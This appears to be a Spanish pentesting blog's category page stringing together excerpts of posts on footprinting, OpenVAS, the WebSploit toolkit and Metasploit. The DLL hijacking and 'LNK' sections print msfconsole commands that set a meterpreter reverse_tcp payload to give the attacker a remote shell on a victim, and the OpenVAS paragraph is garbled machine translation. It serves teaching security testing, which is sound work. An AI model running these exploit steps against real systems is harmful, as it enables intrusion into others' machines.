El alcance de esta actividad es la recogida de información acerca de un sitio web publicado en Internet, o encontrar un tipo específico de aplicación, como Webmin o VNC. Hay herramientas disponibles que pueden ayudar con esta técnica, como por ejemplo googlegath, pero también es posible realizar esta operación manualmente usando las opciones de búsqueda de la web de Google. Esta operación no requiere de conocimientos técnicos especializados, y es un sistema muy bueno para recopilar información sobre una web objetivo
Categoría: Backtrack
Backtrack
Pentesting – Pruebas básicas de reconocimiento web (fingerprinting/footprinting)
Footprinting
El termino footprinting hace referencia a la técnica de descubrir y recoger la mayor cantidad de información posible con respecto a una red de destino, bien porque haya sido publicada a propósito o por desconocimiento. El objetivo es extraer información relativa de la organización que incluye, pero no se limita a:
- Rangos de direcciones IP
- Información del registrador del dominio
- Servidores internos
- Cuentas de correo de los usuarios
- Nombres de las maquinas
- Tipo de firewall implementado
- Tipos de acceso remoto utilizados (SSH o VPN)
- Archivos (doc, xls, ppt, pdf, txt, etc)
- Metadatos, etc
instalar OpenVas 4 en Debian Squeeze
¿Que es OpenVAS?
OpenVAS (Explorador del gravamen de la vulnerabilidad de OpenSource), previamente GNessUs, es a GLP bifurcación del Nessus explorador de la seguridad para no prohibir a futuro el desarrollo libre de la herramienta ahora-propietaria.
OpenVAS fue propuesto originalmente cerca pentesters en Seguridad de la computadora de Portcullis y entonces anunciado por Tim Brown encendidoSlashdot. OpenVAS es un proyecto del miembro de Software en el interés público[1]. Previamente, había sido votado hacia fuera porque el proyecto aparecía ser muerto.[2] Los dominios de OpenVAS fueron donados por SecuritySpace, el recibimiento fue donado por la Nth dimensión/el Internet público y los honorarios de conferencia de DevCon 1 eran pagados para cerca Intevation y Sistemas del DN.
WebSploit Toolkit Version 1.5 Released
WebSploit es un proyecto OpenSource para la búsqueda de vulnerabilidades en sistemas remotos.
Aqui vemos algunas de sus funciones principales:
[+]Autopwn – Used From Metasploit For Scan and Exploit Target Service
[+]wmap – Scan,Crawler Target Used From Metasploit wmap plugin
[+]format infector – inject reverse & bind payload into file format
[+]phpmyadmin – Search Target phpmyadmin login page
[+]lfi – Scan,Bypass local file inclusion Vulnerability & can be bypass some WAF
[+]apache users – search server username directory (if use from apache webserver)
[+]Dir Bruter – brute target directory with wordlist
[+]admin finder – search admin & login page of target
[+]MLITM Attack – Man Left In The Middle, XSS Phishing Attacks
[+]MITM – Man In The Middle Attack
[+]Java Applet Attack – Java Signed Applet Attack
[+]MFOD Attack Vector – Middle Finger Of Doom Attack Vector
[+]USB Infection Attack – Create Executable Backdoor For Infect USB For Windows
Explotar vulnerabilidad RDP de Microsoft (MS12-020) con metasploit
Recientemente ha aparecido una vulnerabilidad que afecta a Windows y su implementación del protocolo RDP (Remote Desktop Protocol)
[Videotutoriales Metasploit] Uso Extensivo
En el blog Blackploit han publicado 3 videotutoriales creados por Japtron
Explotando XSS con Metasploit
XSSF es un framework, creado por Ludovic Courgnaud, que nos permite “administrar” víctimas de XSS genéricos y realizar posteriores ataques, así como mantener el enlace para futuros ataques. Podemos encontrar una descripción más detallada del framework aquí.
DLL Hijacking con Metasploit
Aunque no es algo nuevo, últimamente se habla mucho sobre DLL Hijacking o suplantación de librerías DLL, gracias al reciente fallo de los sistemas Microsoft Windows que permite ejecutar código malicioso, colocando la dll a suplantar en la misma carpeta del programa ejecutable, descubierto hace poco por HD Moore y explicado a fondo en su articuloExploiting DLL Hijacking Flaws, también ha publicado un kit, para buscar aplicaciones que puedan ser vulnerables a este tipo de ataque DLLHijaAuditKit.
Abrimos metasplit
rokitoh@red-orbita# msfconsolemsf > use exploit/windows/browser/webdav_dll_hijackermsf exploit(webdav_dll_hijacker) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(webdav_dll_hijacker) > set EXTENSIONS «grp p7c vcf wab»EXTENSIONS => grp p7c vcf wabmsf exploit(webdav_dll_hijacker) > set lhost 192.168.1.111lhost => 192.168.1.111msf exploit(webdav_dll_hijacker) > exploit[*] Exploit running as background job.[*] Started reverse handler on 192.168.1.111:4444[*][*] Exploit links are now available at \192.168.1.111documents[*][*] Using URL: http://0.0.0.0:80/[*] Local IP: http://192.168.1.111:80/
Instalar Katana 1.5
Como ya comentamos antes te da la posibilidad de tener múltiples distribuciones de seguridad en tu USB.
Explotando «LNK» con MetaSploit
MetaSploit nuevamente tiene un PoC para una vulnerabilidad que todavía no posee un parche de corrección de Microsoft.
Para testear esta vulnerabilidad primero debemos actualizar el framework con «svn update», y luego hacemos lo siguiente:
use windows/browser/ms10_xxx_windows_shell_lnk_execute
set SRVHOST 192.168.162.136
set SRVPORT 80
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.162.136
set LPORT 443
exploit
De esta forma vamos a levantar un servidor web en el puerto 80, que cuando la víctima lo visite, nos dará una shell de meterpreter a través del puerto 443. Funciona muy bien!
Todavía no hay un parche de seguridad de Microsoft para corregir este problema, pero pueden encontrar algunos workarounds a continuación:
Microsoft Security Advisory (2286198)
– Security By Default: Solución a la vulnerabilidad «LNK» de Windows mediante Directivas de Restricción de Software
Fuente: http://www.kungfoosion.com/